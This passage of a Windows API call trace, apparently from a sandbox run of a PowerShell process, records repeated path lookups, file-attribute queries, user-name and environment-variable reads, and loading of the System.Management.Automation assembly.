lpBuffer=0x26d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0050.644] SetErrorMode (uMode=0x1) returned 0x1 [0050.644] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x26d310 | out: lpFileInformation=0x26d310*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xbcc623c0, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xbcc623c0, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.644] SetErrorMode (uMode=0x1) returned 0x1 [0050.644] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x26d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0050.644] SetErrorMode (uMode=0x1) returned 0x1 [0050.644] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x26d310 | out: lpFileInformation=0x26d310*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xbcc623c0, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xbcc623c0, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.644] SetErrorMode (uMode=0x1) returned 0x1 [0050.644] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.644] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.649] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x26d250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0050.650] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0050.650] SetErrorMode (uMode=0x1) returned 0x1 [0050.650] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d2d0 | out: lpFileInformation=0x26d2d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.650] SetErrorMode (uMode=0x1) returned 0x1 [0050.650] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0050.650] SetErrorMode (uMode=0x1) returned 0x1 [0050.651] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d2d0 | out: lpFileInformation=0x26d2d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.651] SetErrorMode (uMode=0x1) returned 0x1 [0050.651] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0050.651] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0050.651] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x26d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0050.651] SetErrorMode (uMode=0x1) returned 0x1 [0050.651] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x26d2d0 | out: lpFileInformation=0x26d2d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0050.651] SetErrorMode (uMode=0x1) returned 0x1 [0050.651] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x26d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0050.651] SetErrorMode (uMode=0x1) returned 0x1 [0050.651] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x26d2d0 | out: lpFileInformation=0x26d2d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0050.652] SetErrorMode (uMode=0x1) returned 0x1 [0050.652] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x26d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0050.652] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x26cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0050.652] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x26d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0050.652] SetErrorMode (uMode=0x1) returned 0x1 [0050.652] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x26d2d0 | out: lpFileInformation=0x26d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.652] SetErrorMode (uMode=0x1) returned 0x1 [0050.652] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x26d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0050.652] SetErrorMode (uMode=0x1) returned 0x1 [0050.652] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x26d2d0 | out: lpFileInformation=0x26d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.652] SetErrorMode (uMode=0x1) returned 0x1 [0050.652] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x26d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0050.653] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x26cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0050.653] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x26d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0050.653] SetErrorMode (uMode=0x1) returned 0x1 [0050.653] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x26d2d0 | out: lpFileInformation=0x26d2d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xbcc623c0, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xbcc623c0, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.653] SetErrorMode (uMode=0x1) returned 0x1 [0050.653] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x26d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0050.653] SetErrorMode (uMode=0x1) returned 0x1 [0050.653] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x26d2d0 | out: lpFileInformation=0x26d2d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xbcc623c0, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xbcc623c0, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.653] SetErrorMode (uMode=0x1) returned 0x1 [0050.653] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x26d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0050.653] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x26cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0050.654] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x26d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0050.654] SetErrorMode (uMode=0x1) returned 0x1 [0050.654] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x26d310 | out: lpFileInformation=0x26d310*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0050.654] SetErrorMode (uMode=0x1) returned 0x1 [0050.654] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x26d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0050.654] SetErrorMode (uMode=0x1) returned 0x1 [0050.654] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x26d310 | out: lpFileInformation=0x26d310*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0050.654] SetErrorMode (uMode=0x1) returned 0x1 [0050.654] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0050.655] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x26d000, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0050.655] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x26d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0050.655] SetErrorMode (uMode=0x1) returned 0x1 [0050.655] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x26d310 | out: lpFileInformation=0x26d310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.655] SetErrorMode (uMode=0x1) returned 0x1 [0050.655] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x26d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0050.655] SetErrorMode (uMode=0x1) returned 0x1 [0050.655] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x26d310 | out: lpFileInformation=0x26d310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.655] SetErrorMode (uMode=0x1) returned 0x1 [0050.655] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0050.655] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x26d000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0050.656] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x26d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0050.656] SetErrorMode (uMode=0x1) returned 0x1 [0050.656] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x26d310 | out: lpFileInformation=0x26d310*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xbcc623c0, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xbcc623c0, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.656] SetErrorMode (uMode=0x1) returned 0x1 [0050.656] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x26d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0050.656] SetErrorMode (uMode=0x1) returned 0x1 [0050.656] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x26d310 | out: lpFileInformation=0x26d310*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xbcc623c0, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xbcc623c0, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.656] SetErrorMode (uMode=0x1) returned 0x1 [0050.656] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0050.656] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x26d000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0050.660] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x26d370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0050.660] SetErrorMode (uMode=0x1) returned 0x1 [0050.660] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x26d5d0 | out: lpFileInformation=0x26d5d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xbcc623c0, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xbcc623c0, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.661] SetErrorMode (uMode=0x1) returned 0x1 [0050.704] CoTaskMemAlloc (cb=0x804) returned 0x1b888830 [0050.704] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b888830, nSize=0x26d938 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x26d938) returned 0x1 [0050.705] CoTaskMemFree (pv=0x1b888830) [0050.705] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.705] GetUserNameW (in: lpBuffer=0x43d430, pcbBuffer=0x26d978 | out: lpBuffer="aETAdzjz", pcbBuffer=0x26d978) returned 1 [0050.705] CoTaskMemFree (pv=0x43d430) [0050.707] ReportEventW (hEventLog=0x1b950008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32e2f20*="Available", lpRawData=0x32e2cb0) returned 1 [0050.708] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.708] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.708] CoTaskMemFree (pv=0x1b852880) [0050.710] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.710] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.710] CoTaskMemFree (pv=0x1b852880) [0050.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.723] CoTaskMemFree (pv=0x1b852880) [0050.723] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.723] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf [0050.723] CoTaskMemFree (pv=0x1b852880) [0050.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.725] GetCurrentProcessId () returned 0x9ac [0050.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.728] GetFullPathNameW 